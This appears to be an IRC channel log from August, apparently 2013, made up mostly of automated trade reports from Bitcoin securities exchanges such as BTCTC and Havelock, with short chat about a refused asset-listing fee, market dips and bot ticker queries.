Aug 08 11:04:05 [BTCTC] [ACTIVEMINING] 1 @ 0.00594 BTC [-] Aug 08 11:06:16 [BTCTC] [BTCGARDEN] 57 @ 0.01581 = 0.9012 BTC [-] Aug 08 11:06:17 [BTCTC] [BTCGARDEN] 13 @ 0.01581 = 0.2055 BTC [-] Aug 08 11:06:29 [BTCTC] [ASICMINER-PT] 1 @ 3.615 BTC [+] Aug 08 11:06:48 [BTCTC] [BTCGARDEN] 1 @ 0.01581 BTC [-] Aug 08 11:07:15 [BTCTC] [ASICMINER-PT] 1 @ 3.615 BTC [+] Aug 08 11:07:26 [BTCTC] [BASIC-MINING] 3 @ 0.3263 = 0.9789 BTC [+] Aug 08 11:08:16 [BTCTC] [LABCOIN] 50 @ 0.001425 = 0.0713 BTC [-] Aug 08 11:08:17 [BTCTC] [LABCOIN] 88 @ 0.001424 = 0.1253 BTC [-] Aug 08 11:09:21 [BTCTC] [ASICMINER-PT] 1 @ 3.615 BTC [+] Aug 08 11:10:05 [BTCTC] [ASICMINER-PT] 1 @ 3.615 BTC [+] Aug 08 11:10:18 [BTCTC] [ASICMINER-PT] 1 @ 3.615 BTC [+] Aug 08 11:11:08 [BTCTC] [LABCOIN] 147 @ 0.001412 = 0.2076 BTC [-] Aug 08 11:11:10 [BTCTC] [LABCOIN] 250 @ 0.001404 = 0.351 BTC [-] Aug 08 11:11:11 [BTCTC] [LABCOIN] 1 @ 0.001404 BTC [-] Aug 08 11:11:12 [BTCTC] [LABCOIN] 1370 @ 0.0014 = 1.918 BTC [-] Aug 08 11:11:13 [BTCTC] [LABCOIN] 500 @ 0.0014 = 0.7 BTC [-] Aug 08 11:11:24 [BTCTC] [LABCOIN] 50 @ 0.0014 = 0.07 BTC [-] Aug 08 11:11:25 [BTCTC] [BASIC-MINING] 10 @ 0.31 = 3.1 BTC [-] Aug 08 11:11:30 [BTCTC] [ASICMINER-PT] 1 @ 3.615 BTC [+] Aug 08 11:11:53 [BTCTC] [ASICMINER-PT] 1 @ 3.59 BTC [-] Aug 08 11:12:46 [HAVELOCK] [AM100] 27 @ 0.0386001 = 1.0422 BTC [-] Aug 08 11:12:49 [HAVELOCK] [AM100] 1 @ 0.0386 BTC [-] Aug 08 11:12:51 [HAVELOCK] [AM100] 187 @ 0.0385 = 7.1995 BTC [-] Aug 08 11:12:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [+] Aug 08 11:12:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0365 BTC [-] Aug 08 11:12:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0364 BTC [-] Aug 08 11:12:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.03636 = 0.1091 BTC [-] Aug 08 11:12:57 [BTCTC] [TAT.ASICMINER] 30 @ 0.03636 = 1.0908 BTC [-] Aug 08 11:12:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.0362 = 0.362 BTC [-] Aug 08 11:12:59 [BTCTC] [TAT.ASICMINER] 9 @ 0.0362 = 0.3258 BTC [-] Aug 08 11:13:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.0361 = 0.9025 BTC [-] Aug 08 11:13:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.0361 = 0.722 BTC [-] Aug 08 11:13:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.0361 = 0.1805 BTC [-] Aug 08 11:13:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.0361 = 0.361 BTC [-] Aug 08 11:13:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.036 BTC [-] Aug 08 11:13:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.036 = 0.36 BTC [-] Aug 08 11:13:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.036 = 0.36 BTC [-] Aug 08 11:13:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.036 = 0.36 BTC [-] Aug 08 11:13:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.036 = 0.36 BTC [-] Aug 08 11:13:08 [BTCTC] [TAT.ASICMINER] 9 @ 0.036 = 0.324 BTC [-] Aug 08 11:13:09 [BTCTC] [TAT.ASICMINER] 9 @ 0.03579 = 0.3221 BTC [-] Aug 08 11:13:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.0356 = 0.1068 BTC [-] Aug 08 11:13:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0356 BTC [-] Aug 08 11:13:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.0351 = 0.351 BTC [-] Aug 08 11:13:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.0351 = 0.1053 BTC [-] Aug 08 11:13:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.035 = 0.07 BTC [-] Aug 08 11:13:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.035 = 0.35 BTC [-] Aug 08 11:13:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.035 = 0.07 BTC [-] Aug 08 11:13:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 08 11:13:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 08 11:13:19 [BTCTC] [TAT.ASICMINER] 9 @ 0.035 = 0.315 BTC [-] Aug 08 11:13:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 08 11:13:21 [BTCTC] [TAT.ASICMINER] 83 @ 0.035 = 2.905 BTC [-] Aug 08 11:13:51 [BTCTC] [LABCOIN] 50 @ 0.001385 = 0.0693 BTC [-] Aug 08 11:13:53 [BTCTC] [LABCOIN] 6 @ 0.001384 = 0.0083 BTC [-] Aug 08 11:13:54 [BTCTC] [LABCOIN] 50 @ 0.001383 = 0.0692 BTC [-] Aug 08 11:13:55 [BTCTC] [LABCOIN] 10 @ 0.001381 = 0.0138 BTC [-] Aug 08 11:13:56 [BTCTC] [LABCOIN] 80 @ 0.00138 = 0.1104 BTC [-] Aug 08 11:13:58 [BTCTC] [LABCOIN] 9 @ 0.001366 = 0.0123 BTC [-] Aug 08 11:13:59 [BTCTC] [LABCOIN] 75 @ 0.001365 = 0.1024 BTC [-] Aug 08 11:13:59 [BTCTC] [LABCOIN] 8 @ 0.001356 = 0.0108 BTC [-] Aug 08 11:14:00 [BTCTC] [LABCOIN] 1482 @ 0.001346 = 1.9948 BTC [-] Aug 08 11:14:01 [BTCTC] [LABCOIN] 600 @ 0.001346 = 0.8076 BTC [-] Aug 08 11:14:02 [BTCTC] [LABCOIN] 100 @ 0.001345 = 0.1345 BTC [-] Aug 08 11:14:03 [BTCTC] [LABCOIN] 1250 @ 0.001344 = 1.68 BTC [-] Aug 08 11:14:04 [BTCTC] [LABCOIN] 280 @ 0.001343 = 0.376 BTC [-] Aug 08 11:14:12 whoa asicminer and labcoin taking hits Aug 08 11:14:44 awww Aug 08 11:15:02 [BTCTC] [ACTIVEMINING] 50 @ 0.005863 = 0.2932 BTC [-] Aug 08 11:15:04 [BTCTC] [ACTIVEMINING] 26 @ 0.005862 = 0.1524 BTC [-] Aug 08 11:15:05 [BTCTC] [ACTIVEMINING] 110 @ 0.00586 = 0.6446 BTC [-] Aug 08 11:15:05 [BTCTC] [ACTIVEMINING] 20 @ 0.00582 = 0.1164 BTC [-] Aug 08 11:15:07 [BTCTC] [ACTIVEMINING] 10 @ 0.005811 = 0.0581 BTC [-] Aug 08 11:15:08 [BTCTC] [ACTIVEMINING] 400 @ 0.00581 = 2.324 BTC [-] Aug 08 11:15:09 [BTCTC] [ACTIVEMINING] 134 @ 0.005795 = 0.7765 BTC [-] Aug 08 11:15:21 [BTCTC] [COGNITIVE] 4 @ 0.35 = 1.4 BTC [-] Aug 08 11:16:48 [BTCTC] [DMS.SELLING] 40 @ 0.02443 = 0.9772 BTC [-] Aug 08 11:17:46 [BTCTC] [DMS.PURCHASE] 15 @ 0.02828 = 0.4242 BTC [+] Aug 08 11:17:58 [BTCTC] [ASICMINER-PT] 1 @ 3.614 BTC [+] Aug 08 11:18:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.03794 BTC [+] Aug 08 11:18:49 [BTCTC] [ASICMINER-PT] 1 @ 3.615 BTC [+] Aug 08 11:18:56 [HAVELOCK] [VTX] 4 @ 0.5089999 = 2.036 BTC [-] Aug 08 11:18:58 [HAVELOCK] [VTX] 5 @ 0.509 = 2.545 BTC [+] Aug 08 11:19:00 [HAVELOCK] [VTX] 5 @ 0.51 = 2.55 BTC [+] Aug 08 11:19:46 [BTCTC] [DMS.PURCHASE] 40 @ 0.02828 = 1.1312 BTC [+] Aug 08 11:21:16 i created an asset without knowing there was a 5btc fee, it hasn't been approved yet can i get a refund Aug 08 11:22:32 [BTCTC] [LABCOIN] 1 @ 0.00135 BTC [+] Aug 08 11:22:33 [BTCTC] [LABCOIN] 1 @ 0.001345 BTC [-] Aug 08 11:22:35 [BTCTC] [LABCOIN] 4720 @ 0.001343 = 6.339 BTC [-] Aug 08 11:22:36 [BTCTC] [LABCOIN] 50 @ 0.001343 = 0.0672 BTC [-] Aug 08 11:22:59 [BTCTC] [ASICMINER-PT] 1 @ 3.649 BTC [+] Aug 08 11:23:17 [HAVELOCK] [XBOND] 22 @ 0.00104665 = 0.023 BTC [-] Aug 08 11:23:39 [BTCTC] [LABCOIN] 50 @ 0.001343 = 0.0672 BTC [-] Aug 08 11:23:41 [BTCTC] [LABCOIN] 860 @ 0.001342 = 1.1541 BTC [-] Aug 08 11:23:56 [BTCTC] [ASICMINER-PT] 1 @ 3.65 BTC [+] Aug 08 11:24:38 [BTCTC] [ACTIVEMINING] 2 @ 0.005936 = 0.0119 BTC [+] Aug 08 11:26:07 [BTCTC] [ACTIVEMINING] 7 @ 0.00585 = 0.041 BTC [-] Aug 08 11:26:20 [BTCTC] [LABCOIN] 235 @ 0.001392 = 0.3271 BTC [+] Aug 08 11:26:22 [BTCTC] [LABCOIN] 50 @ 0.001394 = 0.0697 BTC [+] Aug 08 11:27:15 dandate2 what are you getting a refund of ? Aug 08 11:27:26 [BTCTC] [LABCOIN] 50 @ 0.001386 = 0.0693 BTC [-] Aug 08 11:27:27 [BTCTC] [LABCOIN] 235 @ 0.001387 = 0.3259 BTC [+] Aug 08 11:27:28 [BTCTC] [LABCOIN] 14 @ 0.001391 = 0.0195 BTC [+] Aug 08 11:27:38 we don't want to create the asset since it costs 5btc Aug 08 11:27:52 but they already charged us, was hoping to reverse since its not approved yet Aug 08 11:31:03 [BTCTC] [CRYPTO-TRADE] 1 @ 0.195 BTC [+] Aug 08 11:31:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.195 BTC [+] Aug 08 11:31:35 my mind is boggled. who's "we" ? Aug 08 11:31:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.03699 = 1.1097 BTC [-] Aug 08 11:32:08 the asset creating company Aug 08 11:32:37 we thought it was free to list an asset and btct just makes money on trading fees Aug 08 11:32:51 [BTCTC] [BASIC-MINING] 1 @ 0.31 BTC [-] Aug 08 11:33:12 dude. the "asset crating company" ? that thought it's free ? Aug 08 11:33:20 save this somewhere come back to read it as you grow up. Aug 08 11:33:47 yeah we wanted to list our company on the exchange but didn't know it would cost 5 btc to do so. it hasn't listed yet so we were hoping to get a refund Aug 08 11:34:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.03695 = 0.1478 BTC [-] Aug 08 11:35:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.03693 = 0.0739 BTC [-] Aug 08 11:35:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.03693 BTC [-] Aug 08 11:36:28 $avg Aug 08 11:36:29 mircea_popescu: 103.12 Aug 08 11:36:33 [MPEX] [S.MPOE] 1150 @ 0.0008358 = 0.9612 BTC [-] Aug 08 11:36:38 $depth O.USD.C110T Aug 08 11:36:39 mircea_popescu: O.USD.C110T Bids: ['1000 @ 0.0495899', '1000 @ 0.04958989'] Aug 08 11:36:40 mircea_popescu: Asks: ['1000 @ 0.32623945', '1000 @ 0.32623955'] Aug 08 11:37:17 [BTCTC] [BITVPS] 13 @ 0.0019 = 0.0247 BTC [-] Aug 08 11:38:05 [HAVELOCK] [AM100] 210 @ 0.0385 = 8.085 BTC [-] Aug 08 11:38:08 [HAVELOCK] [AM100] 129 @ 0.0380001 = 4.902 BTC [-] Aug 08 11:38:10 [HAVELOCK] [AM100] 161 @ 0.038 = 6.118 BTC [-] Aug 08 11:38:49 [HAVELOCK] [AM100] 500 @ 0.038 = 19 BTC [-] Aug 08 11:39:57 [HAVELOCK] [AM1] 3 @ 3.6500001 = 10.95 BTC [-] Aug 08 11:39:59 [HAVELOCK] [AM1] 5 @ 3.65 = 18.25 BTC [-] Aug 08 11:40:31 [HAVELOCK] [AM100] 200 @ 0.038 = 7.6 BTC [-] Aug 08 11:40:57 [HAVELOCK] [AM100] 200 @ 0.038 = 7.6 BTC [-] Aug 08 11:41:02 [BTCTC] [LABCOIN] 50 @ 0.001377 = 0.0689 BTC [-] Aug 08 11:41:04 [BTCTC] [LABCOIN] 235 @ 0.001378 = 0.3238 BTC [+] Aug 08 11:41:05 [BTCTC] [LABCOIN] 17 @ 0.001379 = 0.0234 BTC [+] Aug 08 11:42:37 [BTCTC] [DMS.MINING] 40 @ 0.005604 = 0.2242 BTC [-] Aug 08 11:44:42 [HAVELOCK] [XBOND] 7 @ 0.00104665 = 0.0073 BTC [-] Aug 08 11:46:04 [HAVELOCK] [AM100] 50 @ 0.038 = 1.9 BTC [-] Aug 08 11:50:29 [HAVELOCK] [AM100] 5 @ 0.03770001 = 0.1885 BTC [-] Aug 08 11:50:31 [HAVELOCK] [AM100] 2 @ 0.0377 = 0.0754 BTC [-] Aug 08 11:50:34 [HAVELOCK] [AM100] 21 @ 0.0377 = 0.7917 BTC [-] Aug 08 11:50:36 [HAVELOCK] [AM100] 1 @ 0.03761001 BTC [-] Aug 08 11:50:38 [HAVELOCK] [AM100] 10 @ 0.0374 = 0.374 BTC [-] Aug 08 11:50:40 [HAVELOCK] [AM100] 10 @ 0.0372 = 0.372 BTC [-] Aug 08 11:50:41 [HAVELOCK] [AM100] 5 @ 0.0372 = 0.186 BTC [-] Aug 08 11:50:43 [HAVELOCK] [AM100] 288 @ 0.0371 = 10.6848 BTC [-] Aug 08 11:50:45 [HAVELOCK] [AM100] 158 @ 0.0371 = 5.8618 BTC [-] Aug 08 11:51:18 [HAVELOCK] [AM100] 142 @ 0.0371 = 5.2682 BTC [-] Aug 08 11:51:21 [HAVELOCK] [AM100] 10 @ 0.03700001 = 0.37 BTC [-] Aug 08 11:51:23 [HAVELOCK] [AM100] 7 @ 0.037 = 0.259 BTC [-] Aug 08 11:51:25 [HAVELOCK] [AM100] 41 @ 0.037 = 1.517 BTC [-] Aug 08 11:54:03 [HAVELOCK] [AM100] 16 @ 0.037 = 0.592 BTC [-] Aug 08 11:54:06 [HAVELOCK] [AM100] 4 @ 0.037 = 0.148 BTC [-] Aug 08 11:54:08 [HAVELOCK] [AM100] 10 @ 0.0368 = 0.368 BTC [-] Aug 08 11:54:09 [HAVELOCK] [AM100] 1 @ 0.03675 BTC [-] Aug 08 11:54:11 [HAVELOCK] [AM100] 228 @ 0.03670001 = 8.3676 BTC [-] Aug 08 11:54:13 [HAVELOCK] [AM100] 197 @ 0.0367 = 7.2299 BTC [-] Aug 08 11:54:16 [HAVELOCK] [AM100] 10 @ 0.0366 = 0.366 BTC [-] Aug 08 11:54:18 [HAVELOCK] [AM100] 30 @ 0.0365 = 1.095 BTC [-] Aug 08 11:54:20 [HAVELOCK] [AM100] 1 @ 0.0364 BTC [-] Aug 08 11:55:31 [BTCTC] [ACTIVEMINING] 1 @ 0.00585 BTC [-] Aug 08 11:55:32 [BTCTC] [ACTIVEMINING] 10 @ 0.00594 = 0.0594 BTC [+] Aug 08 11:55:34 [BTCTC] [ACTIVEMINING] 50 @ 0.005941 = 0.2971 BTC [+] Aug 08 11:55:35 [BTCTC] [ACTIVEMINING] 20 @ 0.005949 = 0.119 BTC [+] Aug 08 11:56:24 [BTCTC] [LABCOIN] 235 @ 0.001366 = 0.321 BTC [-] Aug 08 11:56:24 [BTCTC] [LABCOIN] 199 @ 0.001344 = 0.2675 BTC [-] Aug 08 11:56:26 [BTCTC] [LABCOIN] 20 @ 0.001343 = 0.0269 BTC [-] Aug 08 11:56:27 [HAVELOCK] [AM100] 60 @ 0.0361 = 2.166 BTC [-] Aug 08 11:56:29 [BTCTC] [LABCOIN] 225 @ 0.001342 = 0.302 BTC [-] Aug 08 11:57:01 [BTCTC] [TAT.ASICMINER] 22 @ 0.0361 = 0.7942 BTC [-] Aug 08 11:57:13 [BTCTC] [ACTIVEMINING] 50 @ 0.005947 = 0.2974 BTC [-] Aug 08 11:57:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005948 = 0.1784 BTC [+] Aug 08 11:57:16 [BTCTC] [ACTIVEMINING] 81 @ 0.00595 = 0.482 BTC [+] Aug 08 12:03:22 [BTCTC] [LABCOIN] 235 @ 0.001376 = 0.3234 BTC [+] Aug 08 12:03:24 [BTCTC] [LABCOIN] 17 @ 0.001379 = 0.0234 BTC [+] Aug 08 12:03:26 [BTCTC] [LABCOIN] 50 @ 0.001379 = 0.069 BTC [+] Aug 08 12:03:39 https://twitter.com/ScottWapnerCNBC/statuses/364370798892421120 Aug 08 12:03:43 Twitter / ScottWapnerCNBC: Spoke to Joe Lewis this morning ... Aug 08 12:03:45 lmao. Aug 08 12:05:47 ;;later tell dexx7 https://twitter.com/ScottWapnerCNBC/statuses/364370798892421120 "depends how you want to look at it. on one hand 200 is more than 4 or w/e. on the other, something that happened is more than something that's announced." Aug 08 12:05:47 The operation succeeded. Aug 08 12:11:40 [BTCTC] [NASTY-PT] 5 @ 0.004005 = 0.02 BTC [-] Aug 08 12:11:42 [BTCTC] [NASTY-PT] 20 @ 0.004004 = 0.0801 BTC [-] Aug 08 12:11:42 [BTCTC] [NASTY-PT] 15 @ 0.004003 = 0.06 BTC [-] Aug 08 12:11:43 [BTCTC] [NASTY-PT] 207 @ 0.003613 = 0.7479 BTC [-] Aug 08 12:11:45 [BTCTC] [NASTY-PT] 100 @ 0.003612 = 0.3612 BTC [-] Aug 08 12:11:46 [BTCTC] [NASTY-PT] 353 @ 0.00361 = 1.2743 BTC [-] Aug 08 12:14:36 [BTCTC] [NASTY-PT] 10 @ 0.003611 = 0.0361 BTC [+] Aug 08 12:14:37 [BTCTC] [NASTY-PT] 274 @ 0.00361 = 0.9891 BTC [-] Aug 08 12:16:29 [HAVELOCK] [AM100] 10 @ 0.0375 = 0.375 BTC [+] Aug 08 12:18:09 [BTCTC] [DMS.SELLING] 8 @ 0.0236 = 0.1888 BTC [-] Aug 08 12:18:37 [BTCTC] [ACTIVEMINING] 25 @ 0.005927 = 0.1482 BTC [-] Aug 08 12:18:38 [BTCTC] [ACTIVEMINING] 1 @ 0.005928 BTC [+] Aug 08 12:18:40 [BTCTC] [ACTIVEMINING] 1 @ 0.005949 BTC [+] Aug 08 12:18:41 [BTCTC] [ACTIVEMINING] 19 @ 0.00595 = 0.1131 BTC [+] Aug 08 12:18:41 [BTCTC] [ACTIVEMINING] 64 @ 0.006047 = 0.387 BTC [+] Aug 08 12:18:42 [BTCTC] [ACTIVEMINING] 100 @ 0.006048 = 0.6048 BTC [+] Aug 08 12:18:43 [BTCTC] [ACTIVEMINING] 540 @ 0.00605 = 3.267 BTC [+] Aug 08 12:19:35 [BTCTC] [ACTIVEMINING] 5 @ 0.006049 = 0.0302 BTC [-] Aug 08 12:20:02 [BTCTC] [RSM] 10 @ 0.01173 = 0.1173 BTC [+] Aug 08 12:20:04 [BTCTC] [RSM] 1 @ 0.01173 BTC [+] Aug 08 12:21:29 [MPEX] [S.MPOE] 3542 @ 0.0008358 = 2.9604 BTC [-] Aug 08 12:26:29 [BTCTC] [DMS.SELLING] 2 @ 0.0236 = 0.0472 BTC [-] Aug 08 12:26:35 [HAVELOCK] [XBOND] 17 @ 0.00104665 = 0.0178 BTC [-] Aug 08 12:30:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.03671 = 0.1101 BTC [+] Aug 08 12:34:08 [BTCTC] [TAT.ASICMINER] 12 @ 0.03672 = 0.4406 BTC [+] Aug 08 12:34:36 [HAVELOCK] [XBOND] 25 @ 0.00104664 = 0.0262 BTC [-] Aug 08 12:35:41 [BTCTC] [LABCOIN] 50 @ 0.001375 = 0.0688 BTC [-] Aug 08 12:35:47 [BTCTC] [LABCOIN] 2 @ 0.001376 = 0.0028 BTC [+] Aug 08 12:35:50 [BTCTC] [LABCOIN] 1 @ 0.001379 BTC [+] Aug 08 12:35:51 [BTCTC] [LABCOIN] 20 @ 0.00138 = 0.0276 BTC [+] Aug 08 12:37:44 [BTCTC] [TAT.ASICMINER] 60 @ 0.0367 = 2.202 BTC [-] Aug 08 12:37:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.0366 BTC [-] Aug 08 12:37:47 [BTCTC] [TAT.ASICMINER] 39 @ 0.03655 = 1.4255 BTC [-] Aug 08 12:40:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.03768 = 0.0754 BTC [+] Aug 08 12:40:32 [BTCTC] [BITVPS] 190 @ 0.002013 = 0.3825 BTC [+] Aug 08 12:40:34 [BTCTC] [BITVPS] 250 @ 0.002014 = 0.5035 BTC [+] Aug 08 12:40:46 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 08 12:41:34 [BTCTC] [BITVPS] 198 @ 0.002106 = 0.417 BTC [+] Aug 08 12:42:28 [BTCTC] [NASTY-PT] 10 @ 0.004399 = 0.044 BTC [+] Aug 08 12:42:55 [BTCTC] [LABCOIN] 11 @ 0.001402 = 0.0154 BTC [+] Aug 08 12:43:42 [BTCTC] [ACTIVEMINING] 8 @ 0.006049 = 0.0484 BTC [-] Aug 08 12:43:45 [BTCTC] [ACTIVEMINING] 7 @ 0.006049 = 0.0423 BTC [-] Aug 08 12:45:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.03761 BTC [-] Aug 08 12:45:16 [BTCTC] [PAJKA.BOND] 1 @ 0.02583 BTC [+] Aug 08 12:46:13 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 08 12:47:01 [BTCTC] [TAT.ASICMINER] 14 @ 0.03759 = 0.5263 BTC [-] Aug 08 12:51:04 [BTCTC] [ACTIVEMINING] 1 @ 0.006049 BTC [-] Aug 08 12:51:36 [BTCTC] [ACTIVEMINING] 2 @ 0.006035 = 0.0121 BTC [-] Aug 08 12:55:09 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.002292 = 0.2292 BTC [-] Aug 08 12:55:10 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002291 = 0.0229 BTC [-] Aug 08 12:57:24 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 08 12:57:52 ;;nethash Aug 08 12:57:53 355876.005088 Aug 08 12:58:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.03751 = 0.3751 BTC [-] Aug 08 12:59:29 [BTCTC] [TAT.ASICMINER] 4 @ 0.03752 = 0.1501 BTC [+] Aug 08 13:05:13 [HAVELOCK] [XBOND] 15 @ 0.00104664 = 0.0157 BTC [-] Aug 08 13:06:38 [BTCTC] [LABCOIN] 25 @ 0.001386 = 0.0347 BTC [-] Aug 08 13:06:39 [BTCTC] [LABCOIN] 1 @ 0.001387 BTC [+] Aug 08 13:06:54 [BTCTC] [TAT.MINIGAME] 2 @ 0.0002445 = 0.0005 BTC [+] Aug 08 13:07:11 [BTCTC] [ACTIVEMINING] 10 @ 0.006048 = 0.0605 BTC [+] Aug 08 13:07:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0375 BTC [-] Aug 08 13:10:12 [HAVELOCK] [AM100] 2 @ 0.0378 = 0.0756 BTC [+] Aug 08 13:10:51 [BTCTC] [ACTIVEMINING] 18 @ 0.006049 = 0.1089 BTC [+] Aug 08 13:16:08 [BTCTC] [LTC-MINING] 4 @ 0.4123 = 1.6492 BTC [+] Aug 08 13:16:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.03748 = 0.1499 BTC [-] Aug 08 13:16:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.03749 BTC [+] Aug 08 13:17:29 [BTCTC] [LABCOIN] 1 @ 0.001405 BTC [+] Aug 08 13:17:29 [BTCTC] [LABCOIN] 1389 @ 0.001408 = 1.9557 BTC [+] Aug 08 13:18:30 [BTCTC] [LABCOIN] 3 @ 0.001406 = 0.0042 BTC [-] Aug 08 13:18:33 [BTCTC] [LABCOIN] 3 @ 0.001407 = 0.0042 BTC [+] Aug 08 13:25:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.03747 = 0.1499 BTC [-] Aug 08 13:29:02 [BTCTC] [ACTIVEMINING] 10 @ 0.006049 = 0.0605 BTC [+] Aug 08 13:39:45 [BTCTC] [ACTIVEMINING] 41 @ 0.006049 = 0.248 BTC [+] Aug 08 13:40:43 [HAVELOCK] [AM100] 1 @ 0.0378 BTC [+] Aug 08 13:41:53 [HAVELOCK] [SMG] 5 @ 0.000237 = 0.0012 BTC [+] Aug 08 13:42:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [-] Aug 08 13:42:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0367 BTC [-] Aug 08 13:42:47 [BTCTC] [TAT.ASICMINER] 73 @ 0.0367 = 2.6791 BTC [-] Aug 08 13:43:09 [BTCTC] [COGNITIVE] 5 @ 0.35 = 1.75 BTC [-] Aug 08 13:44:06 [BTCTC] [DMS.PURCHASE] 62 @ 0.02828 = 1.7534 BTC [+] Aug 08 13:44:10 [BTCTC] [COGNITIVE] 1 @ 0.35 BTC [-] Aug 08 13:45:13 [BTCTC] [LTC-MINING] 2 @ 0.2727 = 0.5454 BTC [-] Aug 08 13:45:21 [BTCTC] [BASIC-MINING] 1 @ 0.311 BTC [+] Aug 08 13:45:23 [BTCTC] [BASIC-MINING] 1 @ 0.31 BTC [-] Aug 08 13:45:32 [BTCTC] [ESECURITYSABTC] 1 @ 0.2322 BTC [-] Aug 08 13:45:41 [HAVELOCK] [AM100] 2 @ 0.0378 = 0.0756 BTC [+] Aug 08 13:45:44 [BTCTC] [LTC-MINING] 1 @ 0.2726 BTC [-] Aug 08 13:46:12 [BTCTC] [ASICMINER-PT] 1 @ 3.699 BTC [+] Aug 08 13:46:25 [BTCTC] [ESECURITYSABTC] 8 @ 0.2322 = 1.8576 BTC [-] Aug 08 13:46:50 [BTCTC] [ASICMINER-PT] 1 @ 3.7 BTC [+] Aug 08 13:48:13 [BTCTC] [BASIC-MINING] 1 @ 0.301 BTC [-] Aug 08 13:58:57 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 08 13:59:16 [BTCTC] [PAJKA.BOND] 3 @ 0.02569 = 0.0771 BTC [-] Aug 08 13:59:28 [BTCTC] [BTCGARDEN] 100 @ 0.01602 = 1.602 BTC [+] Aug 08 13:59:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.03767 = 0.113 BTC [+] Aug 08 14:00:25 [BTCTC] [BTCGARDEN] 211 @ 0.01603 = 3.3823 BTC [+] Aug 08 14:00:26 [BTCTC] [NASTY-PT] 41 @ 0.004399 = 0.1804 BTC [+] Aug 08 14:01:13 ;;ticker Aug 08 14:01:13 MtGox BTCUSD ticker | Best bid: 105.00009, Best ask: 105.85983, Bid-ask spread: 0.85974, Last trade: 105.86984, 24 hour volume: 5887.78443304, 24 hour low: 105.00001, 24 hour high: 106.65000, 24 hour vwap: 105.88859 Aug 08 14:01:24 volume wat Aug 08 14:01:37 [BTCTC] [ACTIVEMINING] 16 @ 0.006049 = 0.0968 BTC [+] Aug 08 14:03:12 [BTCTC] [ASICMINER-PT] 1 @ 3.663 BTC [-] Aug 08 14:03:14 [BTCTC] [ASICMINER-PT] 1 @ 3.662 BTC [-] Aug 08 14:03:15 [BTCTC] [ASICMINER-PT] 1 @ 3.66 BTC [-] Aug 08 14:03:16 [BTCTC] [ASICMINER-PT] 1 @ 3.615 BTC [-] Aug 08 14:03:17 [BTCTC] [ASICMINER-PT] 2 @ 3.59 = 7.18 BTC [-] Aug 08 14:03:19 [BTCTC] [ASICMINER-PT] 1 @ 3.56 BTC [-] Aug 08 14:03:20 [BTCTC] [ASICMINER-PT] 2 @ 3.56 = 7.12 BTC [-] Aug 08 14:03:20 [BTCTC] [ASICMINER-PT] 1 @ 3.559 BTC [-] Aug 08 14:03:21 [BTCTC] [ASICMINER-PT] 5 @ 3.54 = 17.7 BTC [-] Aug 08 14:03:22 [BTCTC] [ASICMINER-PT] 1 @ 3.533 BTC [-] Aug 08 14:03:24 [BTCTC] [ASICMINER-PT] 1 @ 3.533 BTC [-] Aug 08 14:03:25 [BTCTC] [ASICMINER-PT] 1 @ 3.532 BTC [-] Aug 08 14:03:26 [BTCTC] [ASICMINER-PT] 5 @ 3.532 = 17.66 BTC [-] Aug 08 14:03:27 [BTCTC] [ASICMINER-PT] 3 @ 3.531 = 10.593 BTC [-] Aug 08 14:03:28 [BTCTC] [ASICMINER-PT] 4 @ 3.531 = 14.124 BTC [-] Aug 08 14:03:39 [BTCTC] [BTCGARDEN] 6 @ 0.01603 = 0.0962 BTC [+] Aug 08 14:04:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.03766 = 0.0753 BTC [-] Aug 08 14:04:50 [BTCTC] [ACTIVEMINING] 2 @ 0.006049 = 0.0121 BTC [+] Aug 08 14:05:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.03766 = 0.113 BTC [-] Aug 08 14:05:29 [BTCTC] [ASICMINER-PT] 1 @ 3.532 BTC [+] Aug 08 14:05:30 